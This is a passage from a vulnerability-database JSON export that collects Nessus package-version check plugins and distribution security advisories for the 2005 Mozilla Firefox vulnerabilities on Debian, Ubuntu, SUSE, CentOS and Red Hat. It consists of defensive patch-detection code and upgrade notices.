(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"mozilla-firefox\", reference:\"1.0.4-2sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mozilla-firefox-dom-inspector\", reference:\"1.0.4-2sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"mozilla-firefox-gnome-support\", reference:\"1.0.4-2sarge3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:23:26", "description": "USN-149-1 fixed some vulnerabilities in the Ubuntu 5.04 (Hoary\nHedgehog) version of Firefox. The version shipped with Ubuntu 4.10\n(Warty Warthog) is also vulnerable to these flaws, so it needs to be\nupgraded as well. Please see\n\nhttp://www.ubuntulinux.org/support/documentation/usn/usn-149-1\n\nfor the original advisory.\n\nThis update also fixes several older vulnerabilities; Some of them\ncould be exploited to execute arbitrary code with full user privileges\nif the user visited a malicious website. (MFSA-2005-01 to\nMFSA-2005-44; please see the following website for details:\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2006-01-15T00:00:00", "title": "Ubuntu 4.10 : mozilla-firefox vulnerabilities (USN-149-3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1381", "CVE-2005-0144", "CVE-2005-0589", "CVE-2005-0142", "CVE-2005-0231", "CVE-2005-0989", "CVE-2005-1158", "CVE-2005-0143", "CVE-2005-2265", "CVE-2005-0585", "CVE-2005-0230", "CVE-2005-0145", "CVE-2005-2267", "CVE-2005-0150", "CVE-2005-0588", "CVE-2005-0399", "CVE-2005-1155", "CVE-2005-1531", "CVE-2005-2261", "CVE-2005-0586", "CVE-2005-1937", "CVE-2005-0233", "CVE-2005-1157", "CVE-2005-1153", "CVE-2005-0255", "CVE-2005-0590", "CVE-2005-0146", "CVE-2005-1532", "CVE-2005-0752", "CVE-2005-1159", "CVE-2005-0232", "CVE-2005-2270", "CVE-2005-0584", "CVE-2005-0587", "CVE-2005-2264", "CVE-2005-1154", "CVE-2005-1160", "CVE-2005-0592", "CVE-2005-0591", "CVE-2005-1156", "CVE-2004-1156", "CVE-2005-2269", "CVE-2005-0141", "CVE-2005-2263", "CVE-2005-0578", "CVE-2005-2260", "CVE-2005-0401", "CVE-2005-2262", "CVE-2005-0402", "CVE-2005-0147", "CVE-2005-2268", "CVE-2005-2266", "CVE-2005-0593"], "modified": "2006-01-15T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-ca", "p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-es", "p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-tr", "p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-it", "p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox", "p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-pl", "cpe:/o:canonical:ubuntu_linux:4.10", "p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-dom-inspector", "p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-de", "p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-ja", "p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-uk", "p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-nb", "p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-fr"], "id": "UBUNTU_USN-149-3.NASL", "href": "https://www.tenable.com/plugins/nessus/20546", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-149-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20546);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2004-1156\", \"CVE-2004-1381\", \"CVE-2005-0141\", \"CVE-2005-0142\", \"CVE-2005-0143\", \"CVE-2005-0144\", \"CVE-2005-0145\", \"CVE-2005-0146\", \"CVE-2005-0147\", \"CVE-2005-0150\", \"CVE-2005-0230\", \"CVE-2005-0231\", \"CVE-2005-0232\", \"CVE-2005-0233\", \"CVE-2005-0255\", \"CVE-2005-0399\", \"CVE-2005-0401\", \"CVE-2005-0402\", \"CVE-2005-0578\", \"CVE-2005-0584\", \"CVE-2005-0585\", \"CVE-2005-0586\", \"CVE-2005-0587\", \"CVE-2005-0588\", \"CVE-2005-0589\", \"CVE-2005-0590\", \"CVE-2005-0591\", \"CVE-2005-0592\", \"CVE-2005-0593\", \"CVE-2005-0752\", \"CVE-2005-0989\", \"CVE-2005-1153\", \"CVE-2005-1154\", \"CVE-2005-1155\", \"CVE-2005-1156\", \"CVE-2005-1157\", \"CVE-2005-1158\", \"CVE-2005-1159\", \"CVE-2005-1160\", \"CVE-2005-1531\", \"CVE-2005-1532\", \"CVE-2005-1937\", \"CVE-2005-2260\", \"CVE-2005-2261\", \"CVE-2005-2262\", \"CVE-2005-2263\", \"CVE-2005-2264\", \"CVE-2005-2265\", \"CVE-2005-2266\", \"CVE-2005-2267\", \"CVE-2005-2268\", \"CVE-2005-2269\", \"CVE-2005-2270\");\n script_xref(name:\"USN\", value:\"149-3\");\n\n script_name(english:\"Ubuntu 4.10 : mozilla-firefox vulnerabilities (USN-149-3)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-149-1 fixed some vulnerabilities in the Ubuntu 5.04 (Hoary\nHedgehog) version of Firefox. The version shipped with Ubuntu 4.10\n(Warty Warthog) is also vulnerable to these flaws, so it needs to be\nupgraded as well. Please see\n\nhttp://www.ubuntulinux.org/support/documentation/usn/usn-149-1\n\nfor the original advisory.\n\nThis update also fixes several older vulnerabilities; Some of them\ncould be exploited to execute arbitrary code with full user privileges\nif the user visited a malicious website. (MFSA-2005-01 to\nMFSA-2005-44; please see the following website for details:\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox compareTo() Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-nb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-firefox-locale-uk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2005-2018 Canonical, Inc. / NASL script (C) 2006-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"mozilla-firefox\", pkgver:\"1.0.6-0ubuntu0.0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"mozilla-firefox-dom-inspector\", pkgver:\"1.0.6-0ubuntu0.0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"mozilla-firefox-locale-ca\", pkgver:\"1.0-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"mozilla-firefox-locale-de\", pkgver:\"1.0-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"mozilla-firefox-locale-es\", pkgver:\"1.0-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"mozilla-firefox-locale-fr\", pkgver:\"1.0-0ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"mozilla-firefox-locale-it\", pkgver:\"1.0-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"mozilla-firefox-locale-ja\", pkgver:\"1.0-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"mozilla-firefox-locale-nb\", pkgver:\"1.0-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"mozilla-firefox-locale-pl\", pkgver:\"1.0-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"mozilla-firefox-locale-tr\", pkgver:\"1.0-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"mozilla-firefox-locale-uk\", pkgver:\"1.0-0ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mozilla-firefox / mozilla-firefox-dom-inspector / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:56:36", "bulletinFamily": "unix", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2005-2261", "CVE-2005-1937", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "description": "Various security vulnerabilities in the mozilla browser suite and the Mozilla Firefox browser have been reported and fixed upstream.\n#### Solution\nPlease install the upgraded packages and make sure you restart your browsers after the update. A workaround would be to deinstall the Mozilla browser suite and/or the Firefox web browser.", "edition": 1, "modified": "2005-08-11T15:28:02", "published": "2005-08-11T15:28:02", "href": "http://lists.opensuse.org/opensuse-security-announce/2005-08/msg00009.html", "id": "SUSE-SA:2005:045", "title": "information leak in mozilla,MozillaFirefox,epiphany,galeon", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2019-12-20T18:25:11", "bulletinFamily": "unix", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2004-0718", "CVE-2005-2261", "CVE-2005-1937", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2114", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "description": "**CentOS Errata and Security Advisory** CESA-2005:586\n\n\nMozilla Firefox is an open source Web browser.\r\n\r\nA bug was found in the way Firefox handled synthetic events. It is possible\r\nthat Web content could generate events such as keystrokes or mouse clicks\r\nthat could be used to steal data or execute malicious JavaScript code. The\r\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\r\nthe name CAN-2005-2260 to this issue.\r\n\r\n\r\nA bug was found in the way Firefox executed Javascript in XBL controls. It\r\nis possible for a malicious webpage to leverage this vulnerability to\r\nexecute other JavaScript based attacks even when JavaScript is disabled.\r\n(CAN-2005-2261)\r\n\r\nA bug was found in the way Firefox set an image as the desktop wallpaper.\r\nIf a user chooses the \"Set As Wallpaper...\" context menu item on a\r\nspecially crafted image, it is possible for an attacker to execute\r\narbitrary code on a victim's machine. (CAN-2005-2262)\r\n\r\nA bug was found in the way Firefox installed its extensions. If a user can\r\nbe tricked into visiting a malicious webpage, it may be possible to obtain\r\nsensitive information such as cookies or passwords. (CAN-2005-2263)\r\n\r\nA bug was found in the way Firefox handled the _search target. It is\r\npossible for a malicious website to inject JavaScript into an already open\r\nwebpage. (CAN-2005-2264)\r\n\r\nA bug was found in the way Firefox handled certain Javascript functions. It\r\nis possible for a malicious web page to crash the browser by executing\r\nmalformed Javascript code. (CAN-2005-2265)\r\n\r\nA bug was found in the way Firefox handled multiple frame domains. It is\r\npossible for a frame as part of a malicious web site to inject content into\r\na frame that belongs to another domain. This issue was previously fixed as\r\nCAN-2004-0718 but was accidentally disabled. (CAN-2005-1937)\r\n\r\nA bug was found in the way Firefox handled child frames. It is possible for\r\na malicious framed page to steal sensitive information from its parent\r\npage. (CAN-2005-2266)\r\n\r\nA bug was found in the way Firefox opened URLs from media players. If a\r\nmedia player opens a URL that is JavaScript, JavaScript is executed\r\nwith access to the currently open webpage. (CAN-2005-2267)\r\n\r\nA design flaw was found in the way Firefox displayed alerts and prompts.\r\nAlerts and prompts were given the generic title [JavaScript Application]\r\nwhich prevented a user from knowing which site created them. (CAN-2005-2268)\r\n\r\nA bug was found in the way Firefox handled DOM node names. It is possible\r\nfor a malicious site to overwrite a DOM node name, allowing certain\r\nprivileged chrome actions to execute the malicious JavaScript. (CAN-2005-2269)\r\n\r\nA bug was found in the way Firefox cloned base objects. It is possible for\r\nWeb content to navigate up the prototype chain to gain access to privileged\r\nchrome objects. (CAN-2005-2270)\r\n\r\nUsers of Firefox are advised to upgrade to this updated package that\r\ncontains Firefox version 1.0.6 and is not vulnerable to these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-July/023980.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-July/023987.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-July/023988.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-586.html", "edition": 4, "modified": "2005-07-23T12:26:55", "published": "2005-07-21T21:28:02", "href": "http://lists.centos.org/pipermail/centos-announce/2005-July/023980.html", "id": "CESA-2005:586", "title": "firefox security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:30", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0718", "CVE-2005-1937", "CVE-2005-2114", "CVE-2005-2260", "CVE-2005-2261", "CVE-2005-2262", "CVE-2005-2263", "CVE-2005-2264", "CVE-2005-2265", "CVE-2005-2266", "CVE-2005-2267", "CVE-2005-2268", "CVE-2005-2269", "CVE-2005-2270"], "description": "Mozilla Firefox is an open source Web browser.\r\n\r\nA bug was found in the way Firefox handled synthetic events. It is possible\r\nthat Web content could generate events such as keystrokes or mouse clicks\r\nthat could be used to steal data or execute malicious JavaScript code. The\r\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\r\nthe name CAN-2005-2260 to this issue.\r\n\r\n\r\nA bug was found in the way Firefox executed Javascript in XBL controls. It\r\nis possible for a malicious webpage to leverage this vulnerability to\r\nexecute other JavaScript based attacks even when JavaScript is disabled.\r\n(CAN-2005-2261)\r\n\r\nA bug was found in the way Firefox set an image as the desktop wallpaper.\r\nIf a user chooses the \"Set As Wallpaper...\" context menu item on a\r\nspecially crafted image, it is possible for an attacker to execute\r\narbitrary code on a victim's machine. (CAN-2005-2262)\r\n\r\nA bug was found in the way Firefox installed its extensions. If a user can\r\nbe tricked into visiting a malicious webpage, it may be possible to obtain\r\nsensitive information such as cookies or passwords. (CAN-2005-2263)\r\n\r\nA bug was found in the way Firefox handled the _search target. It is\r\npossible for a malicious website to inject JavaScript into an already open\r\nwebpage. (CAN-2005-2264)\r\n\r\nA bug was found in the way Firefox handled certain Javascript functions. It\r\nis possible for a malicious web page to crash the browser by executing\r\nmalformed Javascript code. (CAN-2005-2265)\r\n\r\nA bug was found in the way Firefox handled multiple frame domains. It is\r\npossible for a frame as part of a malicious web site to inject content into\r\na frame that belongs to another domain. This issue was previously fixed as\r\nCAN-2004-0718 but was accidentally disabled. (CAN-2005-1937)\r\n\r\nA bug was found in the way Firefox handled child frames. It is possible for\r\na malicious framed page to steal sensitive information from its parent\r\npage. (CAN-2005-2266)\r\n\r\nA bug was found in the way Firefox opened URLs from media players. If a\r\nmedia player opens a URL that is JavaScript, JavaScript is executed\r\nwith access to the currently open webpage. (CAN-2005-2267)\r\n\r\nA design flaw was found in the way Firefox displayed alerts and prompts.\r\nAlerts and prompts were given the generic title [JavaScript Application]\r\nwhich prevented a user from knowing which site created them. (CAN-2005-2268)\r\n\r\nA bug was found in the way Firefox handled DOM node names. It is possible\r\nfor a malicious site to overwrite a DOM node name, allowing certain\r\nprivileged chrome actions to execute the malicious JavaScript. (CAN-2005-2269)\r\n\r\nA bug was found in the way Firefox cloned base objects. It is possible for\r\nWeb content to navigate up the prototype chain to gain access to privileged\r\nchrome objects. (CAN-2005-2270)\r\n\r\nUsers of Firefox are advised to upgrade to this updated package that\r\ncontains Firefox version 1.0.6 and is not vulnerable to these issues.", "modified": "2017-09-08T11:48:43", "published": "2005-07-21T04:00:00", "id": "RHSA-2005:586", "href": "https://access.redhat.com/errata/RHSA-2005:586", "type": "redhat", "title": "(RHSA-2005:586) firefox security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T19:34:31", "bulletinFamily": "unix", "cvelist": ["CVE-2004-1381", "CVE-2005-0144", "CVE-2005-0589", "CVE-2005-0142", "CVE-2005-0231", "CVE-2005-0989", "CVE-2005-1158", "CVE-2005-0143", "CVE-2005-2265", "CVE-2005-0585", "CVE-2005-0230", "CVE-2005-0145", "CVE-2005-2267", "CVE-2005-0150", "CVE-2005-0588", "CVE-2005-0399", "CVE-2005-1155", "CVE-2005-1531", "CVE-2005-2261", "CVE-2005-0586", "CVE-2005-1937", "CVE-2005-0233", "CVE-2005-1157", "CVE-2005-1153", "CVE-2005-0255", "CVE-2005-0590", "CVE-2005-0146", "CVE-2005-1532", "CVE-2005-0752", "CVE-2005-1159", "CVE-2005-0232", "CVE-2005-2270", "CVE-2005-0584", "CVE-2005-0587", "CVE-2005-2264", "CVE-2005-1154", "CVE-2005-1160", "CVE-2005-0592", "CVE-2005-0591", "CVE-2005-1156", "CVE-2004-1156", "CVE-2005-2269", "CVE-2005-0141", "CVE-2005-2263", "CVE-2005-0578", "CVE-2005-2260", "CVE-2005-0401", "CVE-2005-2262", "CVE-2005-0402", "CVE-2005-0147", "CVE-2005-2268", "CVE-2005-2266", "CVE-2005-0593"], "description": "USN-149-1 fixed some vulnerabilities in the Ubuntu 5.04 (Hoary \nHedgehog) version of Firefox. The version shipped with Ubuntu 4.10 \n(Warty Warthog) is also vulnerable to these flaws, so it needs to be \nupgraded as well. Please see\n\n<http://www.ubuntulinux.org/support/documentation/usn/usn-149-1>\n\nfor the original advisory.\n\nThis update also fixes several older vulnerabilities; Some of them \ncould be exploited to execute arbitrary code with full user privileges \nif the user visited a malicious web site. (MFSA-2005-01 to \nMFSA-2005-44; please see the following web site for details: \n<http://www.mozilla.org/projects/security/known-vulnerabilities.html>)", "edition": 5, "modified": "2005-07-28T00:00:00", "published": "2005-07-28T00:00:00", "id": "USN-149-3", "href": "https://ubuntu.com/security/notices/USN-149-3", "title": "Ubuntu 4.10 update for Firefox vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}